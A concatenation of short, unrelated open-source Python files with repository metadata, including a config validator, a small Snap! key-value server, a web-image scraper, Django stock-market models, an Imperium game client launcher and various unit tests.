count | ed_error('Invalid protocol in config.yml: %s. Valid protocols: %s', protocol, PROTOCOLS)
if protocol == 'ssh':
ssh_ports_count += 1
except Exception:
counted_error('Invalid port format. [port/protocol]')
if len(unique_ports) != len(ports):
counted_error('Duplicate port numbers found.')
if ssh_ports_count > 1:
counted_error('More than one SSH ports. Please, use a single SSH connection.')
if buttons is not None:
if not isinstance(buttons, dict):
counted_error('The buttons field must be a dict.')
else:
for button_key, button in buttons.items():
if button_key not in ports:
counted_error('Button key %s is not found in ports.', button_key)
for key in button.keys():
if key not in BUTTON_CONFIG_KEYS:
counted_error('Key %s is invalid for button %s.', key, button_key)
|
Code-WvS/snapmesh | snapmesh.py | Python | gpl-3.0 | 851 | 0.011751 | #!/u | sr/bin/env python2
import snapext, os
handler = sna | pext.SnapHandler
data = dict()
@handler.route('/')
def main():
return 'Ich bin online!'
@handler.route('/check')
def key_in_data(key):
return key in data
@handler.route('/get')
def get_data(key):
return data[key] if key_in_data(key) else ''
@handler.route('/put')
def set_data(key, value):
data[key] = value
@handler.route('/list')
def list_data():
return '\n'.join(data.keys())
@handler.route('/bye')
def shutdown():
with open('data', 'w+') as _:
_.write(str(data))
exit(1)
#os.system('shutdown -hP now')
if __name__ == '__main__':
if os.path.isfile('data'):
with open('data') as _:
s = _.read()
try:
data = eval(_.read())
except:
pass
snapext.main(handler, 80)
|
tech22info/registrator | regs/mailru_registrator.py | Python | gpl-3.0 | 106 | 0.009434 | #!/usr | /bin/python3
# encoding=utf-8
import reg_mailru_email
print (reg_mailru_email.reg_mailru_email())
| |
pystockhub/book | ch15/01.py | Python | mit | 67 | 0 | import | matplotlib.pyplot as plt
plt.plot([1, | 2, 3, 4])
plt.show()
|
DMIAlumni/pydrone-game | pydrone/drones/base.py | Python | bsd-2-clause | 790 | 0 | class BaseDrone(object):
"""
Drone interface
"""
flipflop = False
distances = []
last_direction = 0
last_modifier = 0
fuel = 2000
graph = Non | e
kb = None
algorithm = None
def __init__(self, world_size, x, y):
# Initialize knowledge base and starting position
self.actual_position = (x, y)
self.kb_generator(world_size, x, y)
def kb_generator(self, world_size, x, y):
raise NotImplementedError()
def move(self, x, y):
raise NotImplementedError()
def strategy(self):
raise NotImplementedError()
def probe(self, distance):
raise NotImplem | entedError()
def print_status(self):
"""
Not required (ex: optimal algorithm test)
"""
pass
|
wemanuel/smry | smry/server-auth/ls/google-cloud-sdk/lib/googlecloudsdk/compute/subcommands/http_health_checks/delete.py | Python | apache-2.0 | 786 | 0.008906 | # Copyright 2014 Google Inc. All Rights Reserved.
""" | Command for deleting HTTP health checks."""
from googlecloudsdk.compute.lib im | port base_classes
class Delete(base_classes.GlobalDeleter):
"""Delete HTTP health checks."""
@staticmethod
def Args(parser):
cli = Delete.GetCLIGenerator()
base_classes.GlobalDeleter.Args(parser, 'compute.httpHealthChecks', cli,
'compute.http-health-checks')
@property
def service(self):
return self.compute.httpHealthChecks
@property
def resource_type(self):
return 'httpHealthChecks'
Delete.detailed_help = {
'brief': 'Delete HTTP health checks',
'DESCRIPTION': """\
*{command}* deletes one or more Google Compute Engine
HTTP health checks.
""",
}
|
widowild/messcripts | exercice/python2/chap15/canon01.py | Python | gpl-3.0 | 1,632 | 0.011029 | # -*- coding:Latin-1 -*-
from Tkinter import *
from math import pi, sin, cos
class Canon(object):
"""Petit canon graphique"""
def __init__(self, boss, x, y):
self.boss = | boss # référence du canevas
self.x1, self.y1 = x, y # axe de rotation du canon
# dessiner la buse du canon, à l'horizontale pour commencer :
self.lbu = 50 # longueur de la buse
self.x2, self.y2 = x + self.lbu, y
self.buse = boss.create_line(self.x1, self.y1, self.x2, self.y2,
width =10)
# dessiner ensuite le corps du | canon par-dessus :
r = 15 # rayon du cercle
boss.create_oval(x-r, y-r, x+r, y+r, fill='blue', width =3)
def orienter(self, angle):
"choisir l'angle de tir du canon"
# rem : le paramètre <angle> est reçu en tant que chaîne de car.
# il faut le traduire en nombre réel, puis convertir en radians :
self.angle = float(angle)*2*pi/360
self.x2 = self.x1 + self.lbu*cos(self.angle)
self.y2 = self.y1 - self.lbu*sin(self.angle)
self.boss.coords(self.buse, self.x1, self.y1, self.x2, self.y2)
if __name__ == '__main__':
# Code pour tester sommairement la classe Canon :
f = Tk()
can = Canvas(f,width =250, height =250, bg ='ivory')
can.pack(padx =10, pady =10)
c1 = Canon(can, 50, 200)
s1 =Scale(f, label='hausse', from_=90, to=0, command=c1.orienter)
s1.pack(side=LEFT, pady =5, padx =20)
s1.set(25) # angle de tir initial
f.mainloop()
|
2ndQuadrant/ansible | test/units/module_utils/facts/virtual/test_linux.py | Python | gpl-3.0 | 876 | 0.003425 | # -*- coding: utf-8 -*-
# Copyright (c) 2020 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from ansible.module_utils.facts.virtual import linux
def test_get_virtual_facts_bhyve(mocker):
mocker.patch('os.path.exists', return_value=False)
mocker.patch('ansible.module_utils.facts.virtual.linux.get_file_co | ntent', return_value='')
mocker.patch('ansible.module_utils.facts.virtual.linux.get_file_lines', return_value=[])
module = mocker.Mock()
module.run_command.return_value = (0, 'BHYVE\n', '')
inst = linux.LinuxVirtual(module)
facts = inst.get_virtual_facts()
expected = {
'virtualization_role': 'guest',
'virtualization_type': 'bhyve' | ,
}
assert facts == expected
|
embaldridge/retriever | app/download_manager.py | Python | mit | 4,858 | 0.00247 | """This class manages dataset downloads concurrently and processes progress
output."""
import wx
from retriever.lib.download import DownloadThread
class DownloadManager:
def __init__(self, parent):
self.dialog = None
self.worker = None
self.queue = []
self.downloaded = set()
self.errors = set()
self.warnings = set()
self.Parent = parent
self.timer = wx.Timer(parent, -1)
self.timer.interval = 10
parent.Bind(wx.EVT_TIMER, self.update, self.timer)
def Download(self, script):
if not script in self.queue and not (self.worker and self.worker.script == script):
self.queue.append(script)
self.downloaded.add(script)
if script in self.errors:
self.errors.remove(script)
self.warnings.remove(script)
self.Parent.script_list.RefreshMe(None)
if not self.timer.IsRunning() and not self.worker and len(self.queue) < 2:
self.timer.Start(self.timer.interval)
return True
return False
def update(self, evt):
self.timer.Stop()
terminate = False
if self.worker:
script = self.worker.script
if self.worker.finished() and len(self.worker.output) == 0:
if hasattr(script, 'warnings') and script.warnings:
self.warnings.add(script)
self.Parent.SetStatusText('\n'.join(str(w) for w in script.warnings))
else:
self.Parent.SetStatusText("")
self.worker = None
self.Parent.script_list.RefreshMe(None)
self.timer.Start(self.timer.interval)
else:
self.worker.output_lock.acquire()
while len(self.worker.output) > 0 and not terminate:
if "Error:" in self.worker.output[0] and script in self.downloaded:
self.downloaded.remove(script)
self.errors.add(script)
if self.write(self.worker) == False:
terminate = True
self.worker.output = self.worker.output[1:]
#self.gauge.SetValue(100 * ((self.worker.scriptnum) /
# (self.worker.progress_max + 1.0)))
self.worker.output_lock.release()
if terminate:
self.Parent.Quit(None)
else:
self.timer.Start(s | elf.timer.interval)
elif self.queue:
script = self.queue[0]
self.queue = self.queue[1:]
self.worker = DownloadThread(self.Parent.engine, script)
self.worker.parent = self
self.worker.start()
self.timer.Start(10)
def flush(self):
pass
def write(self, worker):
s = worker.output[0]
if | '\b' in s:
s = s.replace('\b', '')
if not self.dialog:
wx.GetApp().Yield()
self.dialog = wx.ProgressDialog("Download Progress",
"Downloading datasets . . .\n"
+ " " * len(s),
maximum=1000,
parent=None,
style=wx.PD_SMOOTH
| wx.DIALOG_NO_PARENT
| wx.PD_CAN_ABORT
| wx.PD_AUTO_HIDE
| wx.PD_REMAINING_TIME
)
def progress(s):
if ' / ' in s:
s = s.split(' / ')
total = float(s[1])
current = float(s[0].split(': ')[1])
progress = int((current / total) * 1000)
return (progress if progress > 1 else 1)
else:
return None
current_progress = progress(s)
if current_progress:
(keepgoing, skip) = self.dialog.Update(current_progress, s)
else:
(keepgoing, skip) = self.dialog.Pulse(s)
if not keepgoing:
return False
else:
if self.dialog:
self.dialog.Update(1000, "")
self.dialog.Destroy()
self.dialog = None
if '...' in s:
self.Parent.SetStatusText(s)
else:
self.Parent.script_list.SetStatus(worker.script.name, s)
wx.GetApp().Yield()
return True
|
fstltna/PyImp | pyimp.py | Python | gpl-2.0 | 8,968 | 0.002119 | #!/usr/bin/env python
"""Main initialization file for empire client."""
# Copyright (C) 1998-1999 Kevin O'Connor
# Copyright (C) 2013 William Fittge
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import sys
import os
import getopt
import string
import operator
import traceback
#import pygame # Not used right now
import time
# Key Ideas:
# What is contained within this file:
# This file contains the code necessary to "bootstrap" the other code
# files. The code in this file has been left intentionally sparse because
# it is often translated to byte-code multiple times.
# The use of global variables throughout this project:
# In general, I dislike the use of global variables. I have made an effort
# to document each use of global variables in each module. (True global
# variables - not global constants.) There are a couple of critical global
# variables that future developers should know of:
#
# viewer : The viewer class is defined in just about all modules. This
# variable is used for reporting errors, sending commands, and many other
# functions.
#
# empDb.megaDB : This is the location of the internal database. This
# database stores all the gathered information from the server. Different
# databases can be dynamicaly loaded/saved to disk, but at any one time
# the client only supports a single countries' database.
#
# Although I dislike global variables, I felt it necessary to use them in
# the above circumstances. Under normal conditions, almost all classes and
# functions require both viewer and megaDB. It makes little sense to pass
# these variables with nearly every single call. Also, that many
# references to the same variable is bound to cause some form of circular
# referencing, which is not a good idea(tm) in Python.
###########################################################################
############################ Python 1.5.2 Check ###########################
try:
test = r"Test for 'r' string flag."
del test
try:
# Python 1.5.1 and earlier returned 0 for atoi('-')...
string.atoi('-')
except ValueError:
pass
else:
raise "outdated.."
except:
print """
It appears this version of Python is out-dated. You must have Python 1.5.2
or later installed in order for the client to work. See the web site at:
http://www.python.org/ for more information on upgrading Python.
"""
sys.exit(1)
VERSION = '0.1.0'
###########################################################################
############################# Initialization ############################
def initialize():
"""Parse the command-line and initialize the socket and interface."""
global viewer
# Attempt to find the username.
try: USERNAME = os.environ['USER']
except (AttributeError, KeyError):
USERNAME = 'PythonTk'
# Check command line for the database filename.
usage = ("Usage:\n"
+ str(sys.argv[0]) + " [-a] [-v] [-l] [-p] [-t|-c|-x] [-n] [-I <include directory>] "
+"[<database filename>]")
versionText = """PyImp Imperium Client %s
Copyright (C) 2015 Marisa Giancarla and others.
PyImp comes with ABSOLUTELY NO WARRANTY; for details
type `%s -l'. This is free software, and you are welcome
to redistribute it under certain conditions; type `%s -l'
for details.""" % (VERSION, str(sys.argv[0]), str(sys.argv[0]))
licenseText = """PyImp Imperium Client %s
Copyright (C) 1998-2000 Kevin O'Connor.
Copyright (C) 2001-2002 Laurent Martin.
Copyright (C) 2013 William Fittge.
Copyright (C) 2015 Marisa Giancarla.
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2 as published by the Free Software Foundation.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111,
USA.
To contact the developers, please send email to <info@empiredirectory.net>.
""" % (VERSION)
try:
opts, args = getopt.getopt(sys.argv[1:], 'apvltcxnh?I:', ['help'])
except getopt.error:
print usage
sys.exit()
# Check for help request
argnames = map(operator.getitem, opts, [0]*len(opts))
if ('-h' in argnames or '-?' in argnames or '--help' in argnames
or len(args) > 1):
print usage
sys.exit()
if '-v' in argnames:
print versionText
sys.exit(0)
if '-l' in argnames:
print licenseText
sys.exit(0)
# Check for visual assistance
if '-a' in argnames:
assist = 1
else:
assist = 0
# Check for predict flag
if '-p' in argnames:
predict = 1
else:
predict = 0
# Check for forced text startup
if '-t' in argnames:
textonly = 1
elif '-c' in argnames:
textonly = 2
elif '-x' in argnames:
textonly = -1
else:
textonly = 0
# Check for a request to not automatically connect.
autoconnect = ('-n' not in argnames)
# Get the database name
if len(args) == 1:
FILE = args[0]
else:
F | ILE = "ImpDB"
# Check for included directory list
# The default include path is: the current directory, the program's
# directory.
includes = ['', sys.path[0]]
for i, j in opts:
if i == '-I':
includes[:0] = [j]
def pathPrefix(str, dirlist=includes):
"""Check installation directory for file."""
for i in dirlist:
fullname = os.path.join(i, str)
if os.path.isfile(fullname):
return fullname
# Couldn't f | ind the file - maybe the caller will have more luck:
return ""
# Mangle the system module path. Replace current directory with src/
# sub-directory.
sys.path[0] = os.path.join(sys.path[0], "src")
# Load modules
import empDb
import empQueue
import empCmd
# Hack! Pass on the pathPrefix function
empQueue.pathPrefix = pathPrefix
# Load the database.
try:
empDb.DBIO.load(FILE)
except:
print ("PyImp: Encountered error while loading database.\n"
"PyImp: Perhaps this is an old database?\n")
traceback.print_exc()
sys.exit()
# Setup an automatic database saver.
sys.exitfunc = empDb.DBIO.save
empDb.predict = predict
empDb.assist = assist
if textonly == 1:
import empText
viewer = empText.SText()
elif textonly == 2:
import empCurses
viewer = empCurses.Curses()
elif textonly == -1:
import empTk
viewer = empTk.mainWin()
else:
# Attempt to load Tk viewer. If that fails use text interface.
try:
import empTk
except:
print (
'An exception (%s) raised during Tk initialization:\n"%s"\n'
"Reverting to text interface.\n"
) % tuple(sys.exc_info()[:2])
import empText
viewer = empText.SText()
else:
viewer = empTk.mainWin()
# Set some common defaults among all the interfaces.
empDb. |
barnone/EigenD | tools/pip_cmd/__init__.py | Python | gpl-3.0 | 715 | 0.001399 |
#
# Copyright 2009 Eigenlabs Ltd. http://www.eigenlabs.com
#
# This file is part of EigenD.
#
# EigenD is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# EigenD is distributed in the | hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EigenD. If not, se | e <http://www.gnu.org/licenses/>.
#
|
kouritron/uvs | libuvs/uvsconst.py | Python | bsd-3-clause | 2,870 | 0.006969 |
# this module tries to implement a replacement for python's lack of language enforced constants.
class _UVSConst(object):
# ------------------------------------------------------------------------------------------------------------------
# save the constants here
def _PASSWORD_PROMPT(self):
return ">>> Enter Password: "
def _MERGE3_CONFLICT_DELIMITER_START(self):
return "<<<<<<< "
def _MERGE3_CONFLICT_DELIMITER_MIDDLE_1(self):
return "||||||| "
def _MERGE3_CONFLICT_DELIMITER_MIDDLE_2(self):
return "======= "
def _MERGE3_CONFLICT_DELIMITER_END(self):
return ">>>>>>> "
def _AMS_MERGE_RESULT_FOLDER_NAME(self):
return "merge_result"
def _AMS_CA_FOLDER_NAME(self):
return "common_ancestor"
def _AMS_ONGOING_MERGE_TEMP_FILENAME(self):
return "ongoing_merge"
def _DISK_IO_READ_SIZE_RECOMMENDATION(self):
""" For performance reasons when reading data from a file its better to
read this many bytes at a time, rather than 1 byte at a time. """
return 8192
# ------------------------------------------------------------------------------------------------------------------
# a single setter for all of our properties
def _set_any_const(self, value):
""" Raises | a ValueError exception to emulate language enforced constants. """
raise ValueError("Can't change constants, don't try.")
# | ------------------------------------------------------------------------------------------------------------------
# declare them here for outside use
PASSWORD_PROMPT = property(_PASSWORD_PROMPT, _set_any_const)
MERGE3_CONFLICT_DELIMITER_START = property(_MERGE3_CONFLICT_DELIMITER_START, _set_any_const)
MERGE3_CONFLICT_DELIMITER_MIDDLE_1 = property(_MERGE3_CONFLICT_DELIMITER_MIDDLE_1, _set_any_const)
MERGE3_CONFLICT_DELIMITER_MIDDLE_2 = property(_MERGE3_CONFLICT_DELIMITER_MIDDLE_2, _set_any_const)
MERGE3_CONFLICT_DELIMITER_END = property(_MERGE3_CONFLICT_DELIMITER_END, _set_any_const)
DISK_IO_READ_SIZE_RECOMMENDATION = property(_DISK_IO_READ_SIZE_RECOMMENDATION, _set_any_const)
AMS_MERGE_RESULT_FOLDER_NAME = property(_AMS_MERGE_RESULT_FOLDER_NAME, _set_any_const)
AMS_CA_FOLDER_NAME = property(_AMS_CA_FOLDER_NAME, _set_any_const)
AMS_ONGOING_MERGE_TEMP_FILENAME = property(_AMS_ONGOING_MERGE_TEMP_FILENAME, _set_any_const)
UVSConst = _UVSConst()
if '__main__' == __name__:
print UVSConst.PASSWORD_PROMPT
# this will raise error
# UVSConst.PASSWORD_PROMPT = 10
print UVSConst.MERGE3_CONFLICT_DELIMITER_START
print UVSConst.MERGE3_CONFLICT_DELIMITER_MIDDLE_1
print UVSConst.MERGE3_CONFLICT_DELIMITER_MIDDLE_2
print UVSConst.MERGE3_CONFLICT_DELIMITER_END
print UVSConst.DISK_IO_READ_SIZE_RECOMMENDATION
|
garyForeman/LHBassClassifier | image_scrape/get_thumbnails.py | Python | agpl-3.0 | 3,278 | 0.00061 | #! /usr/bin/env python
"""
Author: Gary Foreman
Created: August 6, 2016
This script scrapes thumbnail images from thread links in the For Sale: Bass
Guitars forum at talkbass.com
"""
from __future__ import print_function
from glob import glob
import os
import sys
import urllib
from PIL import Image, ImageOps
import pymongo
sys.path.append('..')
from utilities.utilities import pause_scrape, report_progress
MIN_PAUSE_SECONDS = 0.15
MAX_PAUSE_SECONDS = 0.5
REPORT_MESSAGE = 'Scraped image'
REPORT_FREQUENCY = 300
DATA_PATH = os.path.join('..', 'data', 'images')
def make_data_dir():
"""
Checks to see whether DATA_PATH exists. If not, creates it.
"""
if not os.path.isdir(DATA_PATH):
os.makedirs(DATA_PATH)
def filename_from_url(thumbnail_url):
"""
thumbnai | l_url : a string with a url to a bass image
Strips filename from the end of thumbnail_url and prepends DATA_PATH.
Also ensures the file extension is jpg
"""
filename = thumbnail_url.strip('/').split('/')[-1]
basename, ext = os.path.splitext(filename)
return os.path.join(DATA_PATH, basename + '.jpg')
def download_thumb(thumbn | ail_url):
"""
thumbnail_url : a string with a url to a bass image
Pulls dowm image from thumbnail_url and stores in DATA_DIR
"""
filename = filename_from_url(thumbnail_url)
try:
urllib.urlretrieve(thumbnail_url, filename)
except IOError:
# URL is not an image file
pass
except UnicodeError:
# URL contains non-ASCII characters
pass
def crop_image(filename):
"""
filename: a string with the name to a locally stored image file
Crops image at filename to 128 x 128 pixels and overwrites original
"""
try:
img = Image.open(filename)
img = ImageOps.fit(img, (128, 128), Image.ANTIALIAS)
img.save(filename)
except NameError:
# File does not exist
pass
except IOError:
# Image is corrupted
try:
os.remove(filename)
except OSError:
# Filename is too long
pass
def main():
make_data_dir()
# Establish connection to MongoDB open on port 27017
client = pymongo.MongoClient()
# Access threads database
db = client.for_sale_bass_guitars
# Get database documents
cursor = db.threads.find()
# Get list of images that have already been scraped
scraped_image_list = glob(os.path.join(DATA_PATH, '*.jpg'))
thumbnail_url_list = []
for document in cursor:
thumbnail_url = document[u'image_url']
try:
filename = filename_from_url(thumbnail_url)
if filename not in scraped_image_list:
thumbnail_url_list.append(thumbnail_url)
except AttributeError:
# thread has no associated thumbnail
pass
client.close()
thumbnail_count = 1
for thumbnail_url in thumbnail_url_list:
download_thumb(thumbnail_url)
filename = filename_from_url(thumbnail_url)
crop_image(filename)
pause_scrape(MIN_PAUSE_SECONDS, MAX_PAUSE_SECONDS)
report_progress(thumbnail_count, REPORT_MESSAGE, REPORT_FREQUENCY)
thumbnail_count += 1
if __name__ == "__main__":
main()
|
jwilson780/VirtualStockMarket | stockmarket/models.py | Python | mit | 2,038 | 0.008342 | from django.db import models
from django.contrib.auth.models import User
class StockStatus(models.Model):
date = models.DateTimeField(auto_now_add=True)
price = models.FloatField()
change = models.FloatField()
volume = models.IntegerField()
average_daily_volume = models.IntegerField()
market_cap = models.CharField(max_length=100)
book_value = models.FloatField()
ebitda = models.CharField(max_length=100)
dividend_per_share = models.FloatField()
dividend_yield = models.FloatField()
earnings_per_share = models.FloatField()
i52_week_high = models.FloatField()
i52_week_low = models.FloatField()
i50_day_moving_average = models.FloatField()
i200_day_moving_average = models.FloatField()
price_to_earnings_ratio = mo | dels.FloatField()
price_to_earnings_growth_ratio = models.FloatField()
price_to_sales_ratio = models.FloatField()
price_to_book_ratio = models.FloatField()
class Stock(models.Model):
symbol = models.CharField(max_length=25)
exchange = models.CharField(max_length=25)
history = models.ManyToManyField(StockStatus)
price = models.FloatField()
def __unicode__(sel | f): return self.symbol
class Order(models.Model):
type = models.CharField(max_length=25)
amount = models.IntegerField()
stock = models.ForeignKey(Stock)
date = models.DateTimeField(auto_now_add=True)
def __unicode__(self): return u'%s %s' % (self.type, self.stock.symbol)
class Position(models.Model):
amount = models.IntegerField()
stock = models.ForeignKey(Stock)
value = models.FloatField()
def __unicode__(self): return u'%s of %s' % (self.amount, self.stock.symbol)
class Portfolio(models.Model):
user = models.ForeignKey(User)
history = models.ManyToManyField(Order)
positions = models.ManyToManyField(Position)
value = models.FloatField()
balance = models.FloatField()
created = models.DateTimeField(auto_now_add=True)
def __unicode__(self): return self.user.username |
piw/pyCDL | pyCDL/route.py | Python | gpl-3.0 | 9,010 | 0 | import numpy as np
from definition import states_by_id
import pyproj as prj
class Route:
"""
A class of Breeding Bird Survey (BBS) route
Each Route includes the following members:
id - id number of the route
name - name of the route
stateID - to which state the route belongs
routeID - route ID inside each state
length - length published by USGS
path - 2D numpy array of point coordinates along the route
in default projection: EPSG:5070 (USGS standard).
!!! Note the points are not the stops of Bird Survey
!!! They are simply points to define a polyline of the route
path2 - path array converted to longitude/latitude
stops - 2D array of stop coordinates along the route
!!! Note the location of stops are calculated
!!! by distance from starting point along the route,
!!! currently hard-coded as every 800 meter (0.5 mile)
stops2 - stops array converted to longitude/latitude
stop_d - distance between stops, by standard should be around 800m,
but may vary a lot, currently I assume the 50 stops
distributed evenly along the route, i.e. stop_d = length / 49
rating - type of route (single or multiple)
TODO: specify details on this feature
"""
# header - for export and print use
header = '%s\t%s\t%s\t%s\t%s\t%s\t%s\n' % (
'ID', 'State ID', 'State',
'Route ID', 'Route Name', 'Route Length', 'Route Rating'
)
def __init__(self, fields, records):
"""
Initialize a Route using information in the USGS shapefile.
fields: field label used in shapefile
records: a list of route part records in the shapefile
"single" route contains only one part
"multiple" route contains multiple parts, but can be
stitched together
"""
# load information from the fields in the shapefile
i = 1
while i < len(fields):
if fields[i][0] == 'rteno':
self.id = records[0].record[i - 1]
self.stateID = self.id // 1000
self.routeID = self.id % 1000
if fields[i][0] == 'RTENAME':
self.name = records[0].record[i - 1]
if fields[i][0] == 'rte_length':
self.length = float(records[0].record[i - 1])
i = i + 1
# generate a complete route path
if len(records) == 1:
self.rating = 'single'
self.path = np.array(records[0].shape.points)
self.path2 = self.to_lonlat(self.path)
else:
self.rating = 'multiple'
# generate a list of points in each segments
self.path = np.array(records[0].shape.points)
thresh = 10.0
i = 1
while i < len(records):
r = np.array(records[i].shape.points)
p1 = self.path[0]
p2 = self.path[-1]
s1 = r[0]
s2 = r[-1]
if np.linalg.norm(p2 - s1) < thresh:
self.path = np.vstack((self.path, r))
elif np.linalg.norm(p2 - s2) < thresh:
self.path = np.vstack((self.path, r[-1::-1]))
elif np.linalg.norm(s2 - p1) < thresh:
self.path = np.vstack((r, self.path))
elif np.linalg.norm(s1 - p1) < thresh:
self.path = np.vstack((r[-1::-1], self.path))
else:
self.rating = 'broken'
break
i = i + 1
self.path2 = self.to_lonlat(self.path)
# calculate 50 stops along the path
if self.rating is not 'broken':
self.stops, self.st | op_d = self.calc_stop()
self.stops2 = self.to_lonlat(self.stops)
else:
self.stops = np.array(())
self.stops2 = np.array(())
self.stop_d = 0.0
# output Route summary
print(self.summary())
def to_lonlat(self, pts):
"""
Convert coordinate from EPSG: | 5070 to EPSG:4326 (Longitude/Latitide)
"""
new_pts = np.zeros_like(pts)
# define input/output projections of lon/lat transformation
inProj = prj.Proj(init='epsg:5070') # Albers Equal Area
outProj = prj.Proj(init='epsg:4326') # Lat/Long Geodetic System
for i in range(len(pts)):
x, y = pts[i]
lon, lat = prj.transform(inProj, outProj, x, y)
new_pts[i] = (lon, lat)
return new_pts
def calc_len(self):
"""
Calculate total length, segment length, x/y displacement of
each segment along the route.
"""
if self.rating is 'broken':
print('ERROR: Cannot calculate length for broken route')
exit(1)
# python list of lengths of segments (between stops)
segments = np.zeros((len(self.path) - 1))
dxy = np.zeros((len(self.path) - 1, 2))
total_len = 0.0
for i in range(1, len(self.path)):
# !!! Only apply to EPSG:5070
# !!! Poor man's method to calc distance between two points
# !!! TODO: change to advanced method to handle different
# !!! projections
p0 = self.path[i - 1]
p1 = self.path[i]
d = np.linalg.norm(p1 - p0)
dxy[i - 1] = p1 - p0
segments[i - 1] = d
total_len += d
return total_len, segments, dxy
def calc_stop(self):
"""
Calculate 50 stops along a BBS route.
"""
if self.rating is 'broken':
print('ERROR: Cannot calculate stops for broken route')
exit(1)
# calculate total path length and generate a list of segment lengths
length, segments, dxy = self.calc_len()
#
# TODO: check if calculated length matched by published data
#
# hard-coded number of stops
nstop = 50
# use the starting point as first stop
stops = np.zeros((50, 2))
stops[0] = self.path[0]
k = 1
# distance between each stop, more or less 800 meters
# TODO: warning if the value not close to 800 meters
# TODO: handle other projections (?)
dstop = length / (nstop - 1)
# "trip" counts how many meters traveled since the last stop
trip = 0.0
for i in range(len(segments)):
seg = trip + segments[i]
# the fraction of two parts that are split by the stop in the
# current segments, used to linearly interpolate stop coordinates
frac = 0.0
while seg >= dstop:
frac += (dstop - trip)
stops[k] = self.path[i] + frac / segments[i] * dxy[i]
k = k + 1
seg -= dstop
trip = 0.0
trip = seg
# handle the last stop
if k == nstop - 1:
stops[-1] = self.path[-1]
elif k < nstop - 1:
# TODO: is this necessary?
print('!!! %d - %s: Not enough stops found, k = %d'
% (self.id, self.name, k))
elif k > nstop:
# TODO: is this necessary?
print('!!! %d - %s: More stops found, k = %d'
% (self.id, self.name, k))
return stops, dstop
def summary(self):
"""
Summary string for print and export
"""
return '%d\t%d\t%s\t%d\t%s\t%f\t%s\n' % (
self.id, self.stateID, states_by_id[self.stateID].name,
self.routeID, self.name, self.length, self.rating
)
def export(self):
"""
Export route information to a CSV file.
"""
if self.rating is 'broken':
print('ERROR: exporting broken route')
exit(1)
with open('rte_' + str(self.id) + '.csv', 'w') as f:
f.write('sep=\t\n')
|
Honzin/ccs | tests/testAdapter/testOkcoincom/testTrades.py | Python | agpl-3.0 | 1,366 | 0.004392 | import unittest
import ccs
import time
####################################################################################################################
# OKCOINCOM #
####################################################################################################################
class Valid(unittest.TestCase):
def setUp(self):
self.stock = ccs.constants.OKCOINCOM
self.base = ccs.constants.BTC
self.quote = ccs.constants.USD
self.trades = ccs.trades(self.stock, self.base, self.quote)
self.m = ccs.okcoincom.public.response
#time.sleep(3)
def testLen(self):
self.assertIsInstance(len(self.trades), int)
def testGetItem(self):
self.assertIsInstance(self.trades[0], self.m.Trad | e)
def testStock(self):
self.assertEqual(self.trades.stock(), self.stock)
def testMethod(se | lf):
self.assertEqual(self.trades.method(), ccs.constants.TRADES)
def testUsymbol(self):
self.assertEqual(self.trades.usymbol(), self.base + ":" + self.quote)
def testOsymbol(self):
pass
def testData(self):
pass
def testRaw(self):
pass
def testStr(self):
pass
if __name__ == '__main__':
unittest.main()
|
marcosfede/algorithms | maths/prime_test.py | Python | gpl-3.0 | 1,595 | 0 | """
prime_test(n) returns a True if n is a prime number else it returns False
"""
import unittest
def prime_test | (n):
if n <= 1:
return False
if n == 2 or n == 3:
return True
if n % 2 == 0 or n % 3 == 0:
return False
j = 5
while j * j <= n:
if n % j == 0 or n % (j + 2) == 0:
return False
j += 6
return True
def prime_test2(n):
# prime numbers are greater than 1
if n > 1:
# check for factors
| for i in range(2, int(n ** 0.5) + 1):
if (n % i) == 0:
# print(num, "is not a prime number")
# print(i, "times", num//i, "is", num)
return False
# print(num, "is a prime number")
return True
# if input number is less than
# or equal to 1, it is not prime
else:
return False
class TestSuite(unittest.TestCase):
def test_prime_test(self):
"""
checks all prime numbers between 2 up to 100.
Between 2 up to 100 exists 25 prime numbers!
"""
counter = 0
for i in range(2, 101):
if prime_test(i):
counter += 1
self.assertEqual(25, counter)
def test_prime_test2(self):
"""
checks all prime numbers between 2 up to 100.
Between 2 up to 100 exists 25 prime numbers!
"""
counter = 0
for i in range(2, 101):
if prime_test(i):
counter += 1
self.assertEqual(25, counter)
if __name__ == "__main__":
unittest.main()
|
pwldp/rodzice-na-czasie-pl | server/source_data/deleteCitiesWithoutSchool.py | Python | gpl-3.0 | 434 | 0.009217 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
import os.path
import sys
import time
#
from slughifi import *
import xlrd
#
from rncMongoDriver import rncMongoDB
#
#
#
#
| #
if __name__ == "__main__":
dburi = 'mongodb://uuuuu:ppppp@127.0.1:27017/rnc_production'
| rncdb = rncMongoDB(dburi,"rnc_production")
print rncdb
#
collCities = rncdb.mongoDB["cities"]
collCities.remove({"has_school":False})
#
# EOF
# |
tyrog236/site-perso | docs/conf.py | Python | mit | 7,708 | 0.007525 | # -*- coding: utf-8 -*-
#
# sammy documentation build configuration file, created by
# sphinx-quickstart on Sun Feb 17 11:46:20 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
